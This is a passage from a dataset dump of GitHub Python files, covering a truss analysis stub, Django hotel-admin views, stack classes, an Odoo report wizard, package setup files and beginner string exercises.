file_path):\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n self.background.save(file_path, quality=95)\n","repo_name":"smash14/PhotoboothDisplay","sub_path":"collage/collage.py","file_name":"collage.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"72745003746","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n## Input truss material properties\nE = 29e3 # Units: ksi\nA = 2 # Units: sq in\n\nnodes = [] # Node coordinates\nelems = [] # Element connections\n\n## Assemble nodal coordinates array (Units: ft)\nnodes.append([0, 0])\nnodes.append([10, 10])\nnodes.append([20, 10])\nnodes.append([10, 0])\n\n## Assemble element connections array\nelems.append([1, 2])\nelems.append([2, 3])\nelems.append([3, 4])\nelems.append([1, 3])\nelems.append([4, 2])\n\n\n## Format the output\nnodes = np.array(nodes).astype(float)\nelems = np.array(elems)\n\n## Convert the node coordinates from ft to in\nnodesInFt = nodes * 12\n\n\n## Assemble the global force vector - units: k\n# f1, f2, f7, & f8 are unknown support reactions\nF = np.zeros_like(nodes)\n\n\n## F[2, 0] Applied: node 2 in x-direction OR\n# F[2, 1] Applied: node 2 in y-direction\nF[2, 1] = -30 # Units: kips\n\n\n\"\"\" \n## Test the outputs thus far:\n\nprint(nodes)\nprint(\" \")\nprint(testConvert)\nprint(\" \")\nprint(elems)\nprint(\" \")\nprint(F)\n\"\"\"\n\n\n# Support displacements\nUr = [0, 0, 0, 0] # Global dof's 1, 2, 7, & 8\n\n# Note: Global dof's 3, 4, 5, & 6 are unknown, non-zero displacements\n\nDofConn = np.ones_like(nodes).astype(int)\nDofConn[0, :] = 0\n\n\n### Truss structural analysis\n\ndef TrussAnalysis():\n NN = len(nodes)\n NE = len(elems)\n DOF = 2\n NDOF = DOF * NN\n \n # Structural analysis\n d = nodes[elems[:, 1], :] - nodes[elems[:, 0], :]\n\n\n\n","repo_name":"Brlaney/python-stiffness","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20776426615","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import fields, models, _\r\n\r\nclass AccountReportGeneralLedgerExcel(models.TransientModel):\r\n _inherit = \"account.report.general.ledger\"\r\n \r\n def _print_report(self, data):\r\n if self._context.get('excel_report'):\r\n data = self.pre_print_report(data)\r\n data['form'].update(self.read(['initial_balance', 'sortby'])[0])\r\n if data['form'].get('initial_balance') and not data['form'].get('date_from'):\r\n raise UserError(_(\"You must define a Start Date\"))\r\n records = self.env[data['model']].browse(data.get('ids', []))\r\n return self.env.ref('true_mart_pos.action_report_general_ledger_excel').report_action(\r\n records, data=data, config=False)\r\n else:\r\n return super(AccountReportGeneralLedgerExcel, self)._print_report(data)","repo_name":"thuyeinaung/True_Mart","sub_path":"true_mart_pos/wizards/account_report_general_ledger_excel.py","file_name":"account_report_general_ledger_excel.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19987557299","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse, Http404 \n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.utils import timezone\n\nfrom .models import Room, RoomOrder\nfrom .formsModel import RoomForm \n\nfrom django.core import serializers\nimport json\n\nfrom django.db.models import Q\n# Create your views here.\n\n# raise Http404(\"Poll does not exist\") //404 response\n\n@login_required(login_url='/login')\ndef index(request):\n\treturn render(request, 'AppAdmin/index.html' )\n\n@login_required(login_url='/login')\ndef rooms(request):\n\tdata = Room.objects.all()\n\tcontext = {'rooms_data': data}\n\treturn render(request, 'AppAdmin/rooms.html', context)\n\n@login_required(login_url='/login')\ndef addRoom(request):\n\tif request.method == \"POST\" :\n\t\tform = RoomForm(request.POST, request.FILES)\n\t\tform.published_date = timezone.now()\n\t\tis_publish = request.POST.get('is_publish', False);\n\t\t# form.is_publish = is_publish #get_value_of_checkbox(is_publish)\n\t\tprint(\"Check: \",is_publish)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tform = RoomForm()\n\t\t\tmessages.success(request, {'msg': 'Room added successfully', 'icon':'check', 'alert_box':'success'})\n\t\telse:\n\t\t\tprint(\"Error: \",form.errors)\n\t\t\tmessages.error(request, {'msg': 'Failed to add room', 'icon':'ban', 'alert_box':'danger'})\n\telse:\n\t\tform = RoomForm()\n\n\tcontext = {'form': form}\n\treturn render(request, 'AppAdmin/add-room.html', context)\n\n@login_required(login_url='/login')\ndef editRoom(request, get_room_no):\n\tif request.method == \"POST\" :\n\t\tmessages.success(request, {'msg': 'Room added successfully ', 'icon':'check', 'alert_box':'success'})\n\telse:\n\t\tform = EditRoomForm()\n\t# \tmessages.error(request, {'msg': 'Failed to add room', 'icon':'ban', 'alert_box':'danger'})\n\trooms_data = Room.objects.all()\n\t\n\t# res = serializers.serialize( 'json' , rooms_data)\n\tcontext = {'form': form}\n\t# context = {'rooms_data': rooms_data}\n\n@login_required(login_url='/login')\ndef bookingDetails(request):\n\tdata = RoomOrder.objects.all().order_by('order_timestamp')\n\tprint(\"Data: \", data)\n\tcontext = {'rooms_orders': data}\n\treturn render(request, 'AppAdmin/booking-details.html', context)\n\n\n@login_required(login_url='/login')\ndef profile(request):\n\tcontext = {}\n\treturn render(request, 'AppAdmin/booking-details.html', context)\n\n@login_required(login_url='/login')\ndef SaveRoomDetails(request):\n\tcontext = {'status' : 'failed', 'message' : '' }\n\t\t# context.update(data= 33)\n\n\tif request.method == 'POST':\n\t\troom_no = request.POST['room_no']\n\t\troom_type = request.POST['room_type']\n\t\tprice = request.POST['price']\n\t\tdetails = request.POST['details']\n\t\tis_publish = request.POST.get('is_publish', False);\n\t\tdata = Room.objects.get(room_no=room_no)\n\t\tdata.room_type = room_type\n\t\tdata.price = price\n\t\tdata.details = details\n\t\tdata.is_publish = get_value_of_checkbox(is_publish)\n\n\t\tdata.save()\n\t\tcontext.update(status= 'success')\n\t\tcontext.update(message= ' Room updated successfully...')\n\telse:\n\t\tcontext.update(message= 'Invaild Request')\n\n\treturn JsonResponse(context)\n\n@login_required(login_url='/login')\ndef getRoomDetails(request):\n\tcontext = {}\n\tstatus = 'failed'\n\tmessage = ''\n \n\tif request.method == 'POST':\n\t\tr_no = str(request.POST['id'])\n\t\tif 
r_no:\n\t\t\tdata = Room.objects.get(room_no=r_no)\n\t\t\tif data:\n\t\t\t\t# context = serializers.serialize(\"json\", data)\n\t\t\t\tcontext = {\n\t\t\t\t\t'room_no':data.room_no,\n\t\t\t\t\t'room_type':data.room_type,\n\t\t\t\t\t'price': data.price,\n\t\t\t\t\t'image': 'media/'+str(data.image),\n\t\t\t\t\t'is_publish': data.is_publish,\n\t\t\t\t\t'details': str(data.details),\n\n\t\t\t\t}\n\t\t\t\tstatus = 'success'\n\t\t\t\t# return HttpResponse(context, content_type='text/json')\n\t\t\telse:\n\t\t\t\tmessage = 'No record found'\n\t\telse:\n\t\t\tmessage = 'invalid input'\n\telse:\n\t\tcontext = {'error':'method not supported'}\n\treturn JsonResponse({'status':status, 'message':message, 'data':context})\n\t\n\n@login_required(login_url='/login')\ndef dataTableAjax(request):\n\ttable_data = []\n\tpublish = ''\n\tdb_column = ['image','room_no', 'room_type', 'price', 'details', 'is_publish']\n\tget_request = request.GET\n\tget_val =request.GET\n\t\n\ttry:\n\t\tdraw = request.GET.get('draw')\n\t\tstart = int(request.GET.get('start'))\n\t\tlength = int(request.GET.get('length'))\n\t\tsearch = request.GET.get('search[value]')\n\t\torder = request.GET.get('order[0][dir]')\n\t\torder_column = request.GET.get('order[0][column]')\n\texcept Exception as e:\n\t\tstart = 0\n\t\tlength = 10\n\t\tsearch = ''\n\t\t# raise e\n\n\tfilter_val = (\n\t\tQ(room_no__contains=search) | \n\t\tQ(room_type__icontains=search) | \n\t\tQ(price__contains=search) | \n\t\tQ(details__icontains=search)\n\t)\n\n\ttry:\n\t\torder_val = db_column[int(order_column)]\n\texcept Exception as e:\n\t\torder_val = db_column[1]\n\t\t# raise e\n\n\tif order == 'desc' :\n\t\torder_val = \"-\" + str(order_val)\n\n\tall_data = Room.objects.all()\n\tif search:\n\t\tdata = Room.objects.filter(filter_val).order_by(order_val)[start : start+length]\n\t\tf_data = Room.objects.filter(filter_val)\n\t\trecordsFiltered = f_data.count()\n\telse:\n\t\tdata = Room.objects.filter(filter_val).order_by(order_val)[start : start+length]\n\t\trecordsFiltered = all_data.count()\n\n\trecordsTotal = all_data.count()\n\n\tfor x in data:\n\t\tif x.is_publish == True:\n\t\t\tpublish = ' '\n\t\telse:\n\t\t\tpublish = ' '\n\n\t\tsingle_data = [\n\t\t\t' ',\n\t\t\tx.room_no,\n\t\t\tx.room_type,\n\t\t\tx.price,\n\t\t\tx.details,\n\t\t\tpublish,\n\t\t\t'Edit Delete ' \n\t\t]\n\t\ttable_data.append(single_data)\n\n\tcontext = {\n\t\t\"draw\" : draw,\n\t\t\"recordsTotal\" : recordsTotal,\n\t\t\"recordsFiltered\" : recordsFiltered,\n\t\t\"data\" : table_data\n\t}\n\treturn JsonResponse(context)\n\n\ndef get_value_of_checkbox(value):\n\tif value:\n\t\tvalue_s = 'True'\n\telse:\n\t\tvalue_s = 'False'\n\treturn value_s","repo_name":"pranavmundre/Django-Hotel-Management","sub_path":"AppAdmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13292157976","text":"\n\n#Node\nclass Node(object):\n def __init__(self, value, next):\n self.value = value\n self.next = next\n\n# implement a stack in Python\n# works fine.\nclass Stack(object):\n def __init__(self):\n self.top = Node(0, None)\n self.n = 0\n\n def push(self, value):\n if self.top == None:\n self.top = Node(value, None)\n\n else:\n oldTop = self.top\n self.top = Node(value, oldTop)\n\n self.n +=1 # Syntax: python does not support unary operators like ++ and --\n\n def pop(self):\n item = None\n if self.top == None:\n raise Exception (\"No elements remaining to pop!\")\n else:\n item = self.top.value\n self.top = self.top.next\n\n self.n -=1\n return item\n\n def isEmpty(self):\n return self.n == 0\n\n def size(self):\n return self.n\n\n# ResizingStack in Python\nclass ResizingStack(object):\n def __init__(self):\n self.n = 0\n self.a = [None]# Syntax:1 element empty list\n\n def peek(self):\n \"the next item to be popped\"\n temp = self.n - 1\n return self.a[temp]\n\n def pop(self):\n if self.n < len(self.a)/4:\n self.resize(int(len(self.a)/2))\n\n self.n -= 1\n item = self.a[self.n]\n print (item, \" \")\n return item\n\n def push(self, i):\n if self.n == len(self.a):\n self.resize(2 *self.n)\n self.a[self.n] = i\n self.n +=1\n\n\n def resize(self, size):\n # min = self.n > size if size else self.n# Syntax: ternary operator\n t = [None]*size #empty list of size \"size\"\n for i in range(self.n) :# for loop\n t[i] = self.a[i]\n\n self.a = t\n\n def size(self):\n return self.n\n\n def isEmpty(self):\n return self.n == 0\n\n\ns = Stack()\nassert s.isEmpty() ,\"Should be empty because elements added\"\n\ns.push(13)\nassert s.size() == 1, \"Size should be 1 because one element was added\"\n\ns.push(23)\nassert s.size() == 2, \"\"\n\ns.push(55)\nassert s.size() == 3, \"\"\n\nassert 55 == s.pop()\nassert s.size() == 2, \"\"\n\ns.push(34)\nassert s.size() == 3, \"\"\n\nassert 34 == s.pop()\nassert s.size() == 2, \"\"\n\n# ResizingStack\ns = ResizingStack()\nassert s.isEmpty() ,\"Should be empty because elements added\"\n\ns.push(13)\nassert s.size() == 1, \"Size should be 1 because one element was added\"\nprint(s.peek())\ns.push(23)\nassert s.size() == 2, \"\"\nprint(s.peek())\ns.push(55)\nassert s.size() == 3, \"\"\nprint(s.peek())\nassert 55 == s.pop()\nassert s.size() == 2, \"\"\n\ns.push(34)\nassert s.size() == 3, \"\"\n\nassert 34 == s.pop()\nassert s.size() == 2, \"\"\n\n","repo_name":"SohamGhormade/Python","sub_path":"my_env/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71820259427","text":"from util import check\n\nclass Solution:\n def findLength(self, A, B) -> int:\n arr_sub=[0 for i in range(len(A)+1)]\n arr=[arr_sub.copy() for j in range(len(B)+1)]\n max=0\n for i in range(1,len(A)+1):\n for j in range(1,len(B)+1):\n if A[i-1]==B[j-1]:\n arr[i][j]=arr[i-1][j-1]+1\n if arr[i][j]>max:\n max=arr[i][j]\n return max\n\n\nsol=Solution()\ncheck([[1,2,3,2,1],[3,2,1,4,7] ],[3], sol.findLength)\n","repo_name":"arushkharbanda/coding_pract","sub_path":"python/longest_common_Substring.py","file_name":"longest_common_Substring.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70784874786","text":"import pymongo\nfrom ..conf.settings import conf_obj\n\n\ndef retrieve_financial_data(symbol):\n host = conf_obj.get(\"db_credentials\", \"host\")\n port = conf_obj.get(\"db_credentials\", \"port\")\n db_name = conf_obj.get(\"db_credentials\", \"db_name\")\n mongo_uri = \"mongodb://{host}:{port}/{db_name}\".\\\n format(host=host, port=port, db_name=db_name)\n client = pymongo.MongoClient(mongo_uri)\n db = client.get_default_database()\n return db[symbol].find().sort([(\"date\", pymongo.DESCENDING)])\n","repo_name":"blasrodri/bloomb","sub_path":"bloomb/data_management/database_retriever.py","file_name":"database_retriever.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"10337739050","text":"# The TMPDIR environment variable will override the default above but not the one that\n# might be defined in localConstants.py.\nimport os\nimport sys\n\nstarDirTmp = os.path.join(\"/tmp\", \"watttos\")\n\ntry:\n from localConstants import wattosDirTmp #@UnresolvedImport\nexcept:\n if os.environ.has_key(\"TMPDIR\"):\n wattosDirTmp = os.path.join(os.environ[\"TMPDIR\"], \"watttos\")\n else:\n wattosDirTmp = starDirTmp\n # end if\n# end try\n\nif not os.path.exists(wattosDirTmp):\n# print(\"DEBUG: Creating a temporary dir for wattos: [%s]\" % wattosDirTmp)\n if os.mkdir(wattosDirTmp):\n print(\"ERROR: Failed to create a temporary dir for wattos at: \" + wattosDirTmp)\n sys.exit(1)\n#print 'DEBUG: using wattosDirTmp: ' + wattosDirTmp\n","repo_name":"jurgenfd/wattos","sub_path":"python/Wattos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4253679970","text":"# fifaAnalysis.py\r\n# @coneill 01/03/2023\r\n# Data Analysis Steps:\r\n# 1. Access, 2. Pre-process, \r\n# 3. Analyse, 4. Visualise\r\n\r\n# 1. Access\r\nfrom pandas import *\r\ndataIn = read_csv(\"FIFA21-player-list.csv\")\r\n#print(dataIn)\r\n\r\nageList = dataIn[\"age\"].tolist()\r\nprint(ageList)\r\n\r\n# 2. Pre-process data\r\n# No cleaning needed - all ages are valid\r\n\r\n# 3. Analyse data\r\nimport statistics\r\nprint(\"Mean age: \",statistics.mean(ageList))\r\nprint(\"Modal age: \",statistics.mode(ageList))\r\nprint(\"Median age: \",statistics.median(ageList))\r\nprint(\"Range of ages: \",statistics.variance(ageList))\r\n\r\n# 4. Visualise Data\r\nimport matplotlib.pyplot as plt\r\nageList.sort()\r\nplt.plot(ageList)\r\nplt.show()\r\n\r\n","repo_name":"conacc/LCCSPythonFiles","sub_path":"8. Analytics/fifaAnalysis.py","file_name":"fifaAnalysis.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"36163522596","text":"# Activity 12.2: Task 2\r\n#File: ACT_12_Fibbonacci.py\r\n#Date:\t\t18 Oct 2018\r\n#By: \t\tAlex Tillman\r\n#\t\t\tJustin Kohler\r\n#\t\t\tRyan Steffan \r\n#\t\t\tDavid McCoy\r\n#\r\n#Section:\t021\r\n#Team \t\t256\r\n#\r\n#Electronic Signature\r\n#\tAlex Tillman\r\n#\r\n#\r\n#\r\n#This electronic signature above indiccates the script\r\n#submitted for evaluation is my individual work, and i \r\n#ahve a general understanding of all aspects of its \r\n#development and execution\r\n#\r\n#A BRIEF DESCRIPTION OF WHAT THE SCRIPT OR FUNCTION DOES\r\n#This take the factorial of a number n \r\n\r\ndef myFib(n):\r\n\tinitial = 0\r\n\tif n < 0 or n%1 !=0 :\r\n\t\tprint(\"Invalid entry- number must be non-negative integer\")\r\n\telse\t:\r\n\t\tfibList = [0]\r\n\t\tdigit1 = initial # 0\r\n\t\tdigit2 = 1\r\n\t\tfor num in range(initial,n-1): #0 to 13\r\n\t\t\tdigit1,digit2 = digit2,digit1+digit2\r\n\t\t\tfibList.append(digit1) # 0 + 1 \r\n\t\t\tprint (fibList)\r\n","repo_name":"atillman4/python","sub_path":"fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43213937192","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom travelport.models.vehicle_upsell_offer import VehicleUpsellOffer\nfrom travelport.models.vehicle_upsell_qualify import VehicleUpsellQualify\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/util_v52_0\"\n\n\n@dataclass\nclass VehicleUpsellAdd:\n \"\"\"\n Add command for adding VehicleUpsellQualify,VehicleUpsellOffer.\n \"\"\"\n class Meta:\n namespace = \"http://www.travelport.com/schema/util_v52_0\"\n\n vehicle_upsell_qualify: None | VehicleUpsellQualify = field(\n default=None,\n metadata={\n \"name\": \"VehicleUpsellQualify\",\n \"type\": \"Element\",\n \"required\": True,\n }\n )\n vehicle_upsell_offer: None | VehicleUpsellOffer = field(\n default=None,\n metadata={\n \"name\": \"VehicleUpsellOffer\",\n \"type\": \"Element\",\n }\n )\n","repo_name":"tefra/xsdata-samples","sub_path":"travelport/models/vehicle_upsell_add.py","file_name":"vehicle_upsell_add.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"8155296316","text":"#!/usr/bin/env python\n\"\"\"\nPackaging for the Memory Layout Diagrams.\n\"\"\"\n\nfrom distutils.core import setup\nimport setuptools # noqa\n\nfrom os import path\n# io.open is needed for projects that support Python 2.7\n# It ensures open() defaults to text mode with universal newlines,\n# and accepts an argument to specify the text encoding\n# Python 3 only projects can skip this import\nfrom io import open\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name = 'memory_layout',\n packages = ['memory_layout', 'memory_layout.renderers'],\n version = '0.0.1',\n license='MIT',\n description = 'Generating diagrams to show memory map layouts from code or definition files',\n long_description = long_description,\n long_description_content_type = 'text/markdown',\n author = 'Charles Ferguson',\n author_email = 'gerph@gerph.org',\n url = 'https://github.com/gerph/memory-layout-diagram',\n keywords = ['diagram', 'generator', 'memory-map'],\n install_requires= [\n ],\n classifiers= [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n \"Operating System :: OS Independent\"\n ],\n python_requires='>=2.7',\n entry_points=\"\"\"\n [console_scripts]\n mld = memory_layout.__main__:main\n\"\"\",\n)\n","repo_name":"gerph/memory-layout-diagram","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"70"}
+{"seq_id":"5808952045","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPYABSORP\n========\n\nAuthor:\n Michael Markus Ackermann - dev.toktom@outlook.com\nPyAbsorp:\n This is a package developed to be use to find the Sound Absorption\n Coefficient through some implemented models, like Biot-Allard,\n Johnson-Champoux and others.\n In order to provide such functionalities we require a few packages\n to be installed:\n - Numpy\n - Scipy\n\n You can find out everything available reading the submodules documentation\n\n\nFor further information, check the specific module, class, method or function\ndocumentation.\n\"\"\"\n\nfrom pyabsorp.absorption import absorption_coefficient\nfrom pyabsorp.version import __author__, __date__, __version__\nfrom pyabsorp.models import delany_bazley, rayleigh, biot_allard, johnson_champoux\nfrom pyabsorp.material import Material\nfrom pyabsorp.air import air_properties, air_impedance, air_density, \\\n specific_heat_constant_pressure, specific_heat_constant_volume,\\\n specific_heat_ratio, sound_speed, ceilsius_to_kelvin, pierce, \\\n prandtl, viscosity, Air\nfrom pyabsorp.utils import load_object_with_pickle, save_object_with_pickle\n\n# Just to prevent \"unused\" warnings.\nassert __author__ and __date__ and __version__\n\n# package submodules and scripts to be called as pyabsorp.something\n__all__ = [\n # Functions\n 'absorption_coefficient',\n 'delany_bazley',\n 'rayleigh',\n 'biot_allard',\n 'johnson_champoux',\n 'air_properties',\n 'air_impedance',\n 'air_density',\n 'specific_heat_constant_pressure',\n 'specific_heat_constant_volume',\n 'specific_heat_ratio',\n 'sound_speed',\n 'ceilsius_to_kelvin',\n 'pierce',\n 'prandtl',\n 'viscosity',\n 'load_object_with_pickle',\n 'save_object_with_pickle',\n # Classes\n 'Material',\n 'Air']\n","repo_name":"Toktom/PyAbsorp","sub_path":"pyabsorp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"22419427588","text":"#!/usr/bin/env python3\n\"\"\"\nTask 2. Forward Propagation\n\"\"\"\nimport tensorflow as tf\ncreate_layer = __import__('1-create_layer').create_layer\n\n\ndef forward_prop(x, layer_sizes=[], activations=[]):\n \"\"\"\n Creates the forward propagation graph for the neural network\n\n x: placeholder for the input data\n layer_sizes: list containing the number of nodes in each layer of\n the network\n activations: list containing the activation functions for each layer\n of the network\n\n Returns: the prediction of the network in tensor form\n \"\"\"\n\n for i in range(len(layer_sizes)):\n if i == 0:\n new_layer = create_layer(x, layer_sizes[i], activations[i])\n else:\n new_layer = create_layer(new_layer, layer_sizes[i], activations[i])\n\n return new_layer\n","repo_name":"mattowsh/holbertonschool-machine_learning","sub_path":"supervised_learning/01-tensorflow/2-forward_prop.py","file_name":"2-forward_prop.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9649642586","text":"# 1A\n\nstr1 = \"James\"\n\n\n# print(str1[::2])\n\n# 1B\n\ndef middle_word(word):\n middle_index = int(len(word) / 2)\n print(word[middle_index - 1] + word[middle_index] + word[middle_index + 1])\n\n\nstr2 = \"JhonDipPeta\"\nstr3 = \"JaSonAy\"\n# middle_word(str2)\n# middle_word(str3)\n\n\n# 2\n\ns1 = \"Ault\"\ns2 = \"Kelly\"\n\n\ndef word_inside_word(word1=\"a\", word2=\"b\"):\n return f\"{word1[:2]}{word2}{word1[2:]}\"\n pass\n\n\n# print(word_inside_word(s1, s2))\n\n\n# 3\nsw1 = \"America\"\nsw2 = \"Japan\"\n\n\ndef word_insert(word1=\"\", word2=\"\"):\n result = \"\"\n # for x in range(int((len(word1)) / 2)):\n\n result += f\"{word1[0] + word2[0]}\"\n result += f\"{word1[int(len(word1) / 2)] + word2[int(len(word2) / 2)]}\"\n result += f\"{word1[-1] + word2[-1]}\"\n\n return result\n\n\n# print(word_insert(sw1, sw2))\n\n\n# 4\n\nstra1 = \"PyNaTive\"\n\n\ndef lower_char_first(word):\n temp = \"\"\n result = \"\"\n for letter in word:\n if letter.islower():\n result += letter\n else:\n temp += letter\n\n return result + temp\n\n\n# print(lower_char_first(stra1))\n\n\n# 5\n\nstrb1 = \"P@#yn26at^&i5ve\"\n\n\ndef count_symbols(word):\n chars, digits, symbols = 0, 0, 0\n\n for letter in word:\n if letter.isdigit():\n digits += 1\n elif letter.isalpha():\n chars += 1\n else:\n symbols += 1\n\n return chars, digits, symbols\n\n\n# print(count_symbols(strb1))\n\n# 6\n\ns1 = \"Abc\"\ns2 = \"Xyz\"\n\n\ndef mixed_string(s1, s2):\n result = \"\"\n for x in range(len(s1)):\n result += s1[x] + s2[-(x + 1)]\n return result\n\n\n# print(mixed_string(s1, s2))\n\n# 7\n\nsa1 = \"Yn\"\nsa2 = \"PYnative\"\nsb1 = \"Ynf\"\nsb2 = \"PYnative\"\n\n\ndef if_contains_string(s1, word):\n count = 0\n char_list = []\n [char_list.append(s1[x]) for x in range(len(s1))]\n\n for x in range(len(char_list)):\n if char_list[x] in word:\n count += 1\n\n return count == len(s1)\n\n\n# print(if_contains_string(sa1, sa2))\n# print(if_contains_string(sb1, sb2))\n\n\n# 8\n\ns8 = \"Welcome to USA. usa awesome, isn't it?\"\n\n\ndef find_usa(sentence):\n word = \"usa\"\n list1 = \" \".split(sentence)\n count = 0\n\n for x in range(len(sentence)):\n if word == (sentence[x:x + 3]).lower():\n count += 1\n\n return count\n\n\n# print(find_usa(s8))\n\n# 9\n\nstr9 = \"PYnative29@#8496\"\n\n\ndef sum_num(str):\n sum1 = 0\n count = 0\n for symbol in str:\n if symbol.isdigit():\n sum1 += int(symbol)\n count += 1\n\n print(f\"Sum is : {sum1} Average is {sum1 / count}\")\n\n\n# sum_num(str9)\n\n\n# 10\n# I need lot more practice with dictionaries, how to modify them specificly\nstr10 = \"Apple\"\n\n\ndef chars_in_string(str):\n char_dict = {}\n\n for letter in str:\n if letter not in char_dict:\n char_dict[letter] = 1\n\n elif letter in char_dict:\n a = char_dict.get(letter)\n a += 1\n char_dict[letter] = a\n\n print(char_dict)\n\n\n# chars_in_string(str10)\n\n\n# 11\n\n\nstr11 = \"PYnative\"\n\n\ndef reverse_string(str):\n a = []\n [a.append(str[x]) for x in range(len(str))]\n a.reverse()\n str2 = \"\".join(a)\n return str2\n\n\n# print(reverse_string(str11))\n\n# 12\n\nstr12 = \"Emma is a data scientist who knows Python. 
Emma works at google.\"\n\n\ndef where_is_emma(str):\n for x in range(len(str)):\n # print(str[-x - 5:-x - 1]) # this line is just to see how the loop goes through every substring with lenght of 4 backwards and when it first encounters emma mark that index\n if str[-x - 5:-x - 1] == \"Emma\":\n return (-x - 5) + len(str12)\n\n# print(where_is_emma(str12))\n\n\n# 13\n\nstr13 = \"Emma-is-a-data-scientist\"\n\ndef split_string(str):\n str_list = str.split(\"-\")\n [print(str_list[x]) for x in range(len(str_list))]\n\n#split_string(str13)\n\n#14\n\nstr_list14 = [\"Emma\", \"Jon\", \"\", \"Kelly\", None, \"Eric\", \"\"]\n\ndef remove_empty(list):\n original_list = list.copy()\n new_list = list.copy()\n removed_count = 0\n\n for x in range(len(new_list)):\n if new_list[x - removed_count] == \"\" or new_list[x - removed_count] == None:\n new_list.pop(x - removed_count)\n removed_count += 1\n\n print(f\"Original list of strings:\\n{original_list}\")\n print(f\"After removing empty strings:\\n{new_list}\")\n\n\n\n# remove_empty(str_list14)\n\n\n# 15\n\nstr15 = \"/*Jon is @developer & musician\"\n\ndef remove_special_symbol(str):\n new_str = \"\"\n\n for symbol in str:\n if symbol.isalpha() or symbol == \" \":\n new_str += symbol\n # After this we need to remove extra spaces, the hardest part of this exercise :D:D\n\n new_str_list = new_str.split(\" \")\n\n count = 0\n for x in range(len(new_str_list)):\n if new_str_list[x - count] == \"\":\n new_str_list.pop(x - count)\n count += 1\n \n new_str = \" \".join(new_str_list)\n\n print(new_str)\n\n# remove_special_symbol(str15)\n\n# 16\n\n\nstr16 = 'I am 25 years and 10 months old'\n\ndef remove_all_chars(str):\n result = \"\"\n\n for digit in str:\n if digit.isdigit():\n result += digit\n\n return int(result)\n\n\n\n# print(remove_all_chars(str16))\n\n\n# 17\n\nstr17 = \"Emma25 is Data scientist50 and AI Expert\"\n\ndef number_words(str):\n str_list = str.split(\" \")\n numbers_in_words = []\n\n for word in range(len(str_list)):\n for symbol in range(len(str_list[word])):\n if str_list[word][symbol].isdigit() and str_list[word] not in numbers_in_words:\n numbers_in_words.append(str_list[word])\n\n [print(numbers_in_words[x]) for x in range(len(numbers_in_words))]\n\n# number_words(str17)\n\n# 18\n\nstr18 = '/*Jon is @developer & musician!!'\n\ndef replace_symbols(str):\n a = str\n for symbol in a:\n if not symbol.isdigit() and not symbol.isalpha() and symbol != \" \":\n a = a.replace(symbol, \"#\")\n\n print(a)\n\n# replace_symbols(str18)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Al1babax/Practices","sub_path":"Homework/Al1baba/pynative/Python String Exercise with Solutions.py","file_name":"Python String Exercise with Solutions.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
